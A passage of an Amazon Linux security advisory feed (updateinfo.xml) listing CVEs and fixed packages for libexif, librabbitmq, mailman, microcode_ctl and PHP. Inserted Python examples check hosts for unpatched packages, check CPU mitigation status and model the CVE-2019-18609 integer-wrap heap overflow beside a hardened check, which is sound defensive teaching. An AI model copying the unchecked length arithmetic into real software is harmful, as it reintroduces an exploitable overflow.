arch="i686"><filename>Packages/cairo-tools-1.12.14-6.9.amzn1.i686.rpm</filename></package><package name="cairo-devel" version="1.12.14" 
release="6.9.amzn1" epoch="0" arch="i686"><filename>Packages/cairo-devel-1.12.14-6.9.amzn1.i686.rpm</filename></package><package name="cairo-debuginfo" version="1.12.14" release="6.9.amzn1" epoch="0" arch="i686"><filename>Packages/cairo-debuginfo-1.12.14-6.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1393</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1393: medium priority package update for libexif</title><issued date="2020-07-14 01:51:00" /><updated date="2020-07-15 17:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-13112:
An issue was discovered in libexif before 0.6.22. Several buffer over-reads in EXIF MakerNote handling could lead to information disclosure and crashes. This is different from CVE-2020-0093.
1840344: CVE-2020-13112 libexif: several buffer over-reads in EXIF MakerNote handling can lead to information disclosure and DoS
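The records in this feed can be checked against a host with a short script. What follows is an added example, not Amazon's tooling: it parses the update, reference and pkglist elements in the form used above, applies rpm's epoch:version-release ordering (including the tilde and caret rules) and reports which advisories still apply. The XML fragment and the installed-package list inside it are constructed and mirror the cairo and libexif records of ALAS-2020-1392 and ALAS-2020-1393; the function and variable names are the example's own.
<![CDATA[
```python
"""Which advisories in an updateinfo.xml apply to this host?

Added example, not Amazon's tooling: walks the update records in the format
this feed uses (id, CVE references, pkglist) and compares each listed package
with the installed set using RPM's epoch:version-release ordering.  The XML
fragment and the installed list are constructed; they mirror the cairo and
libexif records of ALAS-2020-1392 and ALAS-2020-1393."""
import re
import xml.etree.ElementTree as ET

UPDATEINFO_SAMPLE = """<updates>
<update type="security"><id>ALAS-2020-1392</id><severity>medium</severity>
<references><reference id="CVE-2016-3190" type="cve"/></references>
<pkglist><collection short="amazon-linux-ami">
<package name="cairo" epoch="0" version="1.12.14" release="6.9.amzn1" arch="x86_64"/>
<package name="cairo-devel" epoch="0" version="1.12.14" release="6.9.amzn1" arch="x86_64"/>
</collection></pkglist></update>
<update type="security"><id>ALAS-2020-1393</id><severity>medium</severity>
<references><reference id="CVE-2020-13112" type="cve"/></references>
<pkglist><collection short="amazon-linux-ami">
<package name="libexif" epoch="0" version="0.6.21" release="6.7.amzn1" arch="x86_64"/>
</collection></pkglist></update>
</updates>"""

# Constructed output of: rpm -qa --qf '%{NAME} %{EPOCH} %{VERSION} %{RELEASE} %{ARCH}\n'
INSTALLED_SAMPLE = """cairo (none) 1.12.14 6.8.amzn1 x86_64
libexif 0 0.6.21 6.7.amzn1 x86_64
"""

def rpmvercmp(a, b):
    """Order two version or release strings as rpm does: split into digit and
    letter runs; digit runs compare numerically, letter runs lexically, digits
    rank above letters; '~' ranks below everything including the end of the
    string; '^' ranks above the end of the string but below any segment."""
    i, j = 0, 0

    def skip(s, k):                      # separators ('.', '-', '_', ...) are ignored
        while k < len(s) and not (s[k].isalnum() or s[k] in "~^"):
            k += 1
        return k

    while i < len(a) or j < len(b):
        i, j = skip(a, i), skip(b, j)
        ca = a[i] if i < len(a) else ""
        cb = b[j] if j < len(b) else ""
        if ca == "~" or cb == "~":
            if ca == cb:
                i, j = i + 1, j + 1
                continue
            return 1 if cb == "~" else -1
        if ca == "^" or cb == "^":
            if ca == cb:
                i, j = i + 1, j + 1
                continue
            if not ca or not cb:
                return 1 if ca else -1
            return 1 if cb == "^" else -1
        if not (ca and cb):
            break
        pat = r"\d+" if ca.isdigit() else r"[A-Za-z]+"
        sa = re.match(pat, a[i:]).group(0)
        mb = re.match(pat, b[j:])
        sb = mb.group(0) if mb else ""
        i, j = i + len(sa), j + len(sb)
        if not sb:                       # run types differ: the digit run wins
            return 1 if ca.isdigit() else -1
        if ca.isdigit():
            sa, sb = sa.lstrip("0"), sb.lstrip("0")
            if len(sa) != len(sb):
                return 1 if len(sa) > len(sb) else -1
        if sa != sb:
            return 1 if sa > sb else -1
    if i >= len(a) and j >= len(b):
        return 0
    return -1 if i >= len(a) else 1

def evr_compare(have, fixed):
    """Compare (epoch, version, release) tuples; negative means 'have' is older."""
    if int(have[0]) != int(fixed[0]):
        return 1 if int(have[0]) > int(fixed[0]) else -1
    return rpmvercmp(have[1], fixed[1]) or rpmvercmp(have[2], fixed[2])

def parse_installed(text):
    """{(name, arch): (epoch, version, release)}; rpm prints '(none)' for no epoch."""
    installed = {}
    for line in text.split("\n"):
        if line.strip():
            name, epoch, ver, rel, arch = line.split()
            installed[(name, arch)] = ("0" if epoch == "(none)" else epoch, ver, rel)
    return installed

def applicable_advisories(xml_text, installed_text):
    """{advisory id: [(package, installed EVR, fixed EVR, CVE list)]} for every
    installed package older than the build the advisory ships."""
    installed = parse_installed(installed_text)
    report = {}
    for upd in ET.fromstring(xml_text).iter("update"):
        cves = [r.get("id") for r in upd.iter("reference") if r.get("type") == "cve"]
        for p in upd.iter("package"):
            have = installed.get((p.get("name"), p.get("arch")))
            fixed = (p.get("epoch", "0"), p.get("version"), p.get("release"))
            if have is not None and evr_compare(have, fixed) < 0:
                report.setdefault(upd.findtext("id"), []).append((p.get("name"), have, fixed, cves))
    return report
```
]]>
On a live host, feed applicable_advisories the cached updateinfo.xml this record is part of and the output of rpm -qa with the query format shown in the comment. yum updateinfo list security performs the equivalent comparison natively, so the script is mainly useful for auditing hosts offline or from a central inventory. The tilde and caret rules matter for pre-release and snapshot tags: a plain string comparison would rank 1.0~rc1 above 1.0 and 6.10 below 6.9, and either mistake hides an unpatched package.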
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13112" title="" id="CVE-2020-13112" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libexif-devel" version="0.6.21" release="6.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libexif-devel-0.6.21-6.7.amzn1.x86_64.rpm</filename></package><package name="libexif" version="0.6.21" release="6.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libexif-0.6.21-6.7.amzn1.x86_64.rpm</filename></package><package name="libexif-debuginfo" version="0.6.21" release="6.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libexif-debuginfo-0.6.21-6.7.amzn1.x86_64.rpm</filename></package><package name="libexif-debuginfo" version="0.6.21" release="6.7.amzn1" epoch="0" arch="i686"><filename>Packages/libexif-debuginfo-0.6.21-6.7.amzn1.i686.rpm</filename></package><package name="libexif-devel" version="0.6.21" release="6.7.amzn1" epoch="0" arch="i686"><filename>Packages/libexif-devel-0.6.21-6.7.amzn1.i686.rpm</filename></package><package name="libexif" version="0.6.21" release="6.7.amzn1" epoch="0" arch="i686"><filename>Packages/libexif-0.6.21-6.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1394</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1394: medium priority package update for librabbitmq</title><issued date="2020-07-14 01:53:00" /><updated date="2020-07-15 17:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18609:
An issue was discovered in amqp_handle_input in amqp_connection.c in rabbitmq-c 0.9.0. There is an integer overflow that leads to heap memory corruption in the handling of CONNECTION_STATE_HEADER. A rogue server could return a malicious frame header that leads to a smaller target_size value than needed. This condition is then carried on to a memcpy function that copies too much data into a heap buffer.
1786646: CVE-2019-18609 librabbitmq: integer overflow in amqp_handle_input in amqp_connection.c leads to heap-based buffer overflow
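This record and the Cineon one in the ImageMagick advisory above (CVE-2019-11470) describe the same failure in two forms: a length controlled by the file or by the peer is used before it is checked. For CVE-2019-18609 the frame size from the server is added to a fixed header-and-footer overhead in 32-bit arithmetic, the sum wraps, the wrapped value sizes the heap buffer and the original value drives the copy. For CVE-2019-11470 the header claims more pixel data than the file holds. The block below is an added example that models both patterns; the buffer class, constants and function names are the example's own and not rabbitmq-c or ImageMagick code. The only protocol facts it relies on are that an AMQP 0-9-1 frame carries a 7-byte header and a 1-byte frame-end marker, and that the frame-max limit is negotiated in Connection.Tune and Tune-Ok.
<![CDATA[
```python
"""Model of the length-handling pattern behind CVE-2019-18609 and CVE-2019-11470.

Added example; buffer class, constants and checks are the example's own, not
rabbitmq-c or ImageMagick code.  Pattern 1: a 32-bit frame size from the peer
plus a fixed overhead wraps, the undersized result is used to allocate, and the
full size is copied.  Pattern 2: a header claims more pixel data than the file
contains."""
MASK32 = 0xFFFFFFFF
HEADER_SIZE, FOOTER_SIZE = 7, 1   # AMQP 0-9-1 frame: 7-byte header, 1-byte frame-end

def target_size_unchecked(frame_size):
    """The vulnerable arithmetic: unsigned 32-bit addition wraps, so a frame
    size near 2**32 yields a tiny target size."""
    return (frame_size + HEADER_SIZE + FOOTER_SIZE) & MASK32

def target_size_checked(frame_size, frame_max):
    """Hardened: bound the untrusted value against the negotiated frame_max
    before any arithmetic on it; subtracting the constant overhead from the
    trusted frame_max cannot wrap."""
    if not 0 <= frame_size <= frame_max - HEADER_SIZE - FOOTER_SIZE:
        raise ValueError("frame size %d exceeds frame_max %d" % (frame_size, frame_max))
    return frame_size + HEADER_SIZE + FOOTER_SIZE

class ModelBuffer:
    """Fixed-size destination standing in for the heap allocation.  A real
    memcpy would silently write past the end; the model raises instead."""
    def __init__(self, size):
        self.data = bytearray(size)

    def copy_in(self, payload):
        if len(payload) > len(self.data):
            raise OverflowError("copying %d bytes into a %d-byte buffer"
                                % (len(payload), len(self.data)))
        self.data[:len(payload)] = payload
        return len(payload)

def receive_frame_unchecked(frame_size, payload):
    """The vulnerable path: allocate with the wrapped size, then copy what the
    header announced.  The payload here is a short stand-in for the real copy
    length, so the demo does not need a 4 GiB buffer to show the overflow."""
    buf = ModelBuffer(target_size_unchecked(frame_size))
    return buf.copy_in(payload)

def pixel_bytes_needed(width, height, bytes_per_pixel, max_pixels=1 << 28):
    """Cineon-style geometry check: bound the dimensions first so the product
    cannot grow without limit, then report how much image data must follow."""
    if width <= 0 or height <= 0 or width * height > max_pixels:
        raise ValueError("implausible geometry %dx%d" % (width, height))
    return width * height * bytes_per_pixel

def has_enough_data(width, height, bytes_per_pixel, remaining):
    """True only when the bytes left in the file cover the claimed image."""
    return pixel_bytes_needed(width, height, bytes_per_pixel) <= remaining
```
]]>
The order of operations is the point: the hardened function compares the untrusted value against the trusted bound minus the constant overhead, so no arithmetic touches the untrusted value before it has been accepted, while the unchecked function adds first and validates nothing. Python integers do not wrap, so the mask makes the 32-bit behaviour explicit; in C the same wrap is silent and the copy that follows corrupts the heap.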
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18609" title="" id="CVE-2019-18609" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="librabbitmq-devel" version="0.1" release="0.2.hgfb6fca832fd2.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/librabbitmq-devel-0.1-0.2.hgfb6fca832fd2.3.amzn1.x86_64.rpm</filename></package><package name="librabbitmq-debuginfo" version="0.1" release="0.2.hgfb6fca832fd2.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/librabbitmq-debuginfo-0.1-0.2.hgfb6fca832fd2.3.amzn1.x86_64.rpm</filename></package><package name="librabbitmq" version="0.1" release="0.2.hgfb6fca832fd2.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/librabbitmq-0.1-0.2.hgfb6fca832fd2.3.amzn1.x86_64.rpm</filename></package><package name="librabbitmq-devel" version="0.1" release="0.2.hgfb6fca832fd2.3.amzn1" epoch="0" arch="i686"><filename>Packages/librabbitmq-devel-0.1-0.2.hgfb6fca832fd2.3.amzn1.i686.rpm</filename></package><package name="librabbitmq-debuginfo" version="0.1" release="0.2.hgfb6fca832fd2.3.amzn1" epoch="0" arch="i686"><filename>Packages/librabbitmq-debuginfo-0.1-0.2.hgfb6fca832fd2.3.amzn1.i686.rpm</filename></package><package name="librabbitmq" version="0.1" release="0.2.hgfb6fca832fd2.3.amzn1" epoch="0" arch="i686"><filename>Packages/librabbitmq-0.1-0.2.hgfb6fca832fd2.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1395</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1395: medium priority package update for mailman</title><issued date="2020-07-14 01:54:00" /><updated date="2020-07-15 17:29:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-13796:
An issue was discovered in GNU Mailman before 2.1.28. A crafted URL can cause arbitrary text to be displayed on a web page from a trusted site.
1609090: CVE-2018-13796 mailman: Mishandled URLs in Utils.py:GetPathPieces() allows attackers to display arbitrary text on trusted sites
CVE-2018-0618:
Cross-site scripting vulnerability in Mailman 2.1.26 and earlier allows remote authenticated attackers to inject arbitrary web script or HTML via unspecified vectors.
1596458: CVE-2018-0618 mailman: Cross-site scripting vulnerability allows malicious listowners to inject scripts into listinfo pages
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0618" title="" id="CVE-2018-0618" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13796" title="" id="CVE-2018-13796" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mailman-debuginfo" version="2.1.15" release="30.25.amzn1" epoch="4" arch="x86_64"><filename>Packages/mailman-debuginfo-2.1.15-30.25.amzn1.x86_64.rpm</filename></package><package name="mailman" version="2.1.15" release="30.25.amzn1" epoch="4" arch="x86_64"><filename>Packages/mailman-2.1.15-30.25.amzn1.x86_64.rpm</filename></package><package name="mailman" version="2.1.15" release="30.25.amzn1" epoch="4" arch="i686"><filename>Packages/mailman-2.1.15-30.25.amzn1.i686.rpm</filename></package><package name="mailman-debuginfo" version="2.1.15" release="30.25.amzn1" epoch="4" arch="i686"><filename>Packages/mailman-debuginfo-2.1.15-30.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1396</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1396: medium priority package update for microcode_ctl</title><issued date="2020-07-14 01:55:00" /><updated date="2020-07-15 17:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-0549:
Cleanup errors in some data cache evictions for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.
1788788: CVE-2020-0549 hw: L1D Cache Eviction Sampling
CVE-2020-0548:
Cleanup errors in some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.
1788786: CVE-2020-0548 hw: Vector Register Data Sampling
CVE-2020-0543:
Incomplete cleanup from specific special register read operations in some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.
A new domain bypass transient execution attack known as Special Register Buffer Data Sampling (SRBDS) has been found. This flaw allows data values from special internal registers to be leaked by an attacker able to execute code on any core of the CPU. An unprivileged, local attacker can use this flaw to infer values returned by affected instructions known to be commonly used during cryptographic operations that rely on uniqueness, secrecy, or both.
1827165: CVE-2020-0543 hw: Special Register Buffer Data Sampling (SRBDS)
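The package ships microcode that the CPU loads at boot, and on a virtualised instance the hypervisor, not the guest, decides which microcode the CPU runs, so the useful check after installing it is what the kernel reports. The script below is an added example and not part of microcode_ctl or this advisory: it reads the per-issue status files the kernel exports under /sys/devices/system/cpu/vulnerabilities/ (srbds, mds, tsx_async_abort and others, on kernels that know about the issue) together with the microcode revision field of /proc/cpuinfo, and lists the issues still reported as vulnerable or unknown. The sample status lines and cpuinfo text are constructed.
<![CDATA[
```python
"""Post-update check for a microcode_ctl advisory.

Added example, not part of the advisory or of microcode_ctl: reads the
per-issue status files under /sys/devices/system/cpu/vulnerabilities/ and the
microcode revision from /proc/cpuinfo so the state after the reboot that loads
the new microcode can be compared with the state before it.  The sample status
lines and cpuinfo text below are constructed."""
import os
import re

VULN_DIR = "/sys/devices/system/cpu/vulnerabilities"

def classify(status):
    """Map one sysfs status line to not_affected / mitigated / vulnerable / unknown."""
    s = status.strip()
    if s.startswith("Not affected"):
        return "not_affected"
    if "Mitigation:" in s:               # also matches 'KVM: Mitigation: ...'
        return "mitigated"
    if "Vulnerable" in s or s.startswith("Processor vulnerable"):
        return "vulnerable"
    return "unknown"                     # e.g. 'Unknown: Dependent on hypervisor status'

def read_vulnerabilities(directory=VULN_DIR):
    """{issue: status line} for every file in the sysfs directory; empty on
    kernels that do not export it."""
    statuses = {}
    if os.path.isdir(directory):
        for name in sorted(os.listdir(directory)):
            with open(os.path.join(directory, name)) as fh:
                statuses[name] = fh.read().strip()
    return statuses

def unmitigated(statuses):
    """Issues the kernel does not report as mitigated or not affected."""
    return sorted(n for n, s in statuses.items() if classify(s) in ("vulnerable", "unknown"))

def microcode_revisions(cpuinfo_text):
    """{(model name, microcode revision): number of logical CPUs} from /proc/cpuinfo text."""
    counts = {}
    for block in cpuinfo_text.strip().split("\n\n"):
        fields = dict(re.findall(r"^([^\t:]+?)\s*:\s*(.*)$", block, re.M))
        key = (fields.get("model name", "?"), fields.get("microcode", "?"))
        counts[key] = counts.get(key, 0) + 1
    return counts

# Constructed samples: what a host might show before the new microcode is loaded.
SAMPLE_STATUS = {
    "srbds": "Vulnerable: No microcode",
    "mds": "Mitigation: Clear CPU buffers; SMT vulnerable",
    "tsx_async_abort": "Not affected",
    "itlb_multihit": "KVM: Mitigation: Split huge pages",
}
SAMPLE_CPUINFO = """processor\t: 0
vendor_id\t: GenuineIntel
model name\t: Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz
microcode\t: 0xb00001a

processor\t: 1
vendor_id\t: GenuineIntel
model name\t: Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz
microcode\t: 0xb00001a
"""

if __name__ == "__main__":
    live = read_vulnerabilities() or SAMPLE_STATUS   # falls back to the sample off-box
    print("needs attention:", unmitigated(live))
    print(microcode_revisions(SAMPLE_CPUINFO))
```
]]>
Run it before the reboot that loads the new microcode and again after it: the srbds entry should move from Vulnerable: No microcode to Mitigation: Microcode, and the microcode revision should change. A host that still reports Unknown: Dependent on hypervisor status is a guest whose mitigation state is decided by the host it runs on, and no package update inside the guest changes that.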
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0543" title="" id="CVE-2020-0543" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0548" title="" id="CVE-2020-0548" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0549" title="" id="CVE-2020-0549" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="microcode_ctl-debuginfo" version="2.1" release="47.39.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-debuginfo-2.1-47.39.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.39.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-2.1-47.39.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.39.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-2.1-47.39.amzn1.i686.rpm</filename></package><package name="microcode_ctl-debuginfo" version="2.1" release="47.39.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-debuginfo-2.1-47.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1397</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1397: medium priority package update for php72 php73</title><issued date="2020-07-14 02:06:00" /><updated date="2020-07-15 17:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11048:
In PHP versions 7.2.x below 7.2.31, 7.3.x below 7.3.18 and 7.4.x below 7.4.6, when HTTP file uploads are allowed, supplying overly long filenames or field names could lead PHP engine to try to allocate oversized memory storage, hit the memory limit and stop processing the request, without cleaning up temporary files created by upload request. This potentially could lead to accumulation of uncleaned temporary files exhausting the disk space on the target server.
1837842: CVE-2019-11048 php: 2 integer wraparound when receiving multipart forms
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11048" title="" id="CVE-2019-11048" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-ldap" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.31" release="1.23.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php72-imap-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" 
version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.31" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.31-1.23.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.31" release="1.23.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-snmp-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.31" release="1.23.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-mysqlnd-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.31" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.31-1.23.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.31" release="1.23.amzn1" epoch="0" 